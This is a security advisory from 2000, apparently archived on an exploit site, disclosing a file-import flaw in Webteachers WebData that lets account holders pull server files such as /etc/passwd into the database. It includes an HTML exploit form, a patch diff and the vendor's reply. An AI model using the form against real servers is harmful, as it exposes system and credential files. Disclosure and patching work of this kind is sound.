what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DST2K0039.txt

DST2K0039.txt
Posted Oct 5, 2000
Site delphisplc.com

Delphis Consulting Plc Security Team Advisory DST2K0039 - WebData allows users which have an account to read any file on the webserver. Patch and exploit information included.

tags | exploit
SHA-256 | 9d9b28782a7e43b0f385240fa3af864d29b9b0299405af6b0e8f22619c48d855

DST2K0039.txt

Change Mirror Download
============================================================================
Delphis Consulting Plc
============================================================================

Security Team Advisories
[26/09/2000]

securityteam@delphisplc.com
[http://www.delphisplc.com/thinking/whitepapers/]

============================================================================
Adv : DST2K0039
Title : Webteachers Webdata: Importing files lower than web root
possible in to database
Author : DCIST (securityteam@delphisplc.com)
O/S : Linux / WindowsNT
Product : Webteachers WebData
Date : 26/09/2000

I. Description

II. Solution

III. Vendor Comments

IV. Disclaimer


============================================================================

I. Description
============================================================================

Vendor URL: http://webteacher.com/webdata/

Delphis Consulting Internet Security Team (DCIST) discovered the following
vulnerability in WebData under Linux (although not tested under WindowsNT
we would expect the same results).

Severity: Medium (due to the fact that you need an account in WebData)

It is possible to import any file (i.e. /etc/passwd) from the file system
which the Webserver user (i.e. nobody) has access to in to the WebData
database. This enables potenial attackers to gain access to the contents
of a number of key files (i.e. hosts.allow / hosts.deny .etc) by browsing
the database afterwards.

Note: You need at least a member account to perform this action.

The below script won't just work but will require a little brain power
to get working with your database. This enables a user to import
anonymously any file that the web user has access to.

example script:
<form action="http://127.0.0.1/cgi-bin/webdata_test.pl" method="post">
<INPUT TYPE=TEXT SIZE=60 NAME="pathname"><BR>
<font size=3>Is the file comma or tab delimited?</font></B>
<select name="delimiter" size=1>
<option value="comma">comma
<option value="tab">tab
<option value="pipe">pipe
</select>
<INPUT TYPE=HIDDEN NAME="member" VALUE="anonymous">
<input type=hidden name="cgifunction" value="import2">
<BR>
<INPUT TYPE=SUBMIT VALUE="Import">
</form>

II. Solution
============================================================================

Vendor Status: Informed

Currently there us no known solution to this problem. Delphis have provided
a patch to the perl script below:

[root@dcist cgi-bin]# diff webdata_new.pl webdata_old.pl
9d8
< $webroot='/home/httpd/html/';
4069,4075c4068
< if (length($user_data{pathname})>0) { # is the user using this method
< $olddata = $user_data{pathname}; # store this so we have it for
later
< $user_data{pathname} = $webroot . $user_data{pathname};
< $user_data{pathname} =~ s/\.\.//g; # strip out all double dots
< }
< print " [$user_data{pathname}] ";
< open (FIELDS,"<$fieldnames") or &error("could not open $fieldnames");

---
> open (FIELDS,"<$fieldnames") or &error('could not open $fieldnames');
4095c4088
< open (FILE,"<$user_data{pathname}") or &error("Could not open
$olddata");
---
> open (FILE,"<$user_data{pathname}") or &error("Could not open
$user_data{pathname}");

III. Vendor Comments
============================================================================

Thank you for the security advise. We will make the patch in the next
release. Most likely, the patch will simply require the imported file to
be in the "uploads" directory, to which Webdata already has an absolute
path, and no slashes will be permitted in the filename.

IV. Disclaimer
============================================================================
THE INFORMATION CONTAINED IN THIS ADVISORY IS BELIEVED TO BE ACCURATE AT
THE TIME OF PRINTING, BUT NO REPRESENTATION OR WARRANTY IS GIVEN, EXPRESS OR
IMPLIED, AS TO ITS ACCURACY OR COMPLETENESS. NEITHER THE AUTHOR NOR THE
PUBLISHER ACCEPTS ANY LIABILITY WHATSOEVER FOR ANY DIRECT, INDIRECT OR
CONSEQUENTIAL LOSS OR DAMAGE ARISING IN ANY WAY FROM ANY USE OF, OR RELIANCE
PLACED ON, THIS INFORMATION FOR ANY PURPOSE.
============================================================================
This e-mail and any files transmitted with it are intended solely for the
addressee and are confidential. They may also be legally
privileged.Copyright in them is reserved by Delphis Consulting PLC
["Delphis"] and they must not be disclosed to, or used by, anyone other than
the addressee.If you have received this e-mail and any accompanying files in
error, you may not copy, publish or use them in any way and you should
delete them from your system and notify us immediately.E-mails are not
secure. Delphis does not accept responsibility for changes to e-mails that
occur after they have been sent. Any opinions expressed in this e-mail may
be personal to the author and may not necessarily reflect the opinions of
Delphis

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close